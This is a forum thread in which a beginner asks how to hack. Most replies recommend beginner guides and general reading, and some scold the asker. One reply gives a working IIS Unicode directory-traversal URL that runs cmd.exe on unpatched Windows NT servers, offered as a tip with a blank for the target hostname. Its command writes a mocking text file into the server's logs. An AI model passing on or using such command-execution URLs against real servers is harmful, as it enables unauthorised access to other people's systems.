Page 1 of 3 123 LastLast

Thread: can anyone help me out.....

Question can anyone help me out.....

can someone teach me the basics of hacking.....
    i want to learn.....

I am sure that there are several people here that could, and maybe would. It really would all depend on whether or not you mean hacking or cracking.
    \"Progress and conduct: I\'m afraid that I am severly dissapointed in God\'s works. All three of him have shown no tendency to improve and He merely sits at the back of the class talking to himselves. He has shown no interest in rugger, asked to be excused prayers, and moves in a mysterious way.\" - Ferndean School Report on God - The brand new Monty Python Book.

Well, I'd suggest you stock up on basic general-purpose computer knowledge and experience. As a default newbie-source, I'd recommend the Happy Hacker's guide to Mostly Harmless Hacking. I think people would be willing to help you with specific problems and questions, but 'teach me how' is just too general a query.
    [HvC]Terr: L33T Technical Proficiency

Banned
    O.k. squaff, no prob. I have a specially crafted URL that will exploit a bug in the NT servers running unpatched versions of the IIS web server.

Just fill in the blanks in the URL denoted by < > characters in a standard web browser, I personally think that IE works the best and hit enter. It will allow you access to the physical partition containing the IIS web directories. (this is a good thing) from there you will just have to poke arround.

Best whishes my friend and godspeed!

Here is the URL
    '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''

http://www.<hostname>.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+echo+I%20am%20a%20lame%20ass%20script%20kid%20trying%20to%20haX0r%20you%20>+c:\winnt\system32\logFiles\w3svc1\1aM3r.txt

'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''

Just enter that into the address bar of the browser and viola! You got em' buddy!

The Guide To (Mostly) Harmless HAcking is awesome. That is where I got started. Also reading up on manuels and just experimenting really helps. I wouldnt recommend just using canned programs or some haxor sites exploits. Find your own and don't be a malicious little twit. Those things are what will make you a great hacker.
    \"Progress and conduct: I\'m afraid that I am severly dissapointed in God\'s works. All three of him have shown no tendency to improve and He merely sits at the back of the class talking to himselves. He has shown no interest in rugger, asked to be excused prayers, and moves in a mysterious way.\" - Ferndean School Report on God - The brand new Monty Python Book.

Go learn off other sites like many others. Some people don't have all day to teach you.

ummm...

You guys are recommending the guide to (mostly) harmless hacking? and if that wasn't bad enough quad goes and posts that...

Well, I suppose no matter how stupid the question you don't deserve advice that bad. If you really want to be more than a script kiddie I suggest spending less time on forums that give out this kind of advice and more time reading. If you want to do stupid **** and get busted, well, you don't need a computer for that.

Anyways, I haven't seen one intelligent thing posted here in a while, so that's it for me. adios.

Wow, your not very nice. Anyways....The Guide To (Mostly) Harmless hacking doesnt make you a script kiddie. In fact it helps steer you in the right direction. It is a great resource if you are just starting out.

I started with guides to mostly harmless hacking. Dude, I'll post a few awesome links when I find them, they're on my hard drive somewhere...

google.com is a great search engine, you can use the directories (great if you don't want links to bloody amazon.com or some reply on a forum) or just a plain search. Go there and find whatever you want, but when I get time I'll find post the links.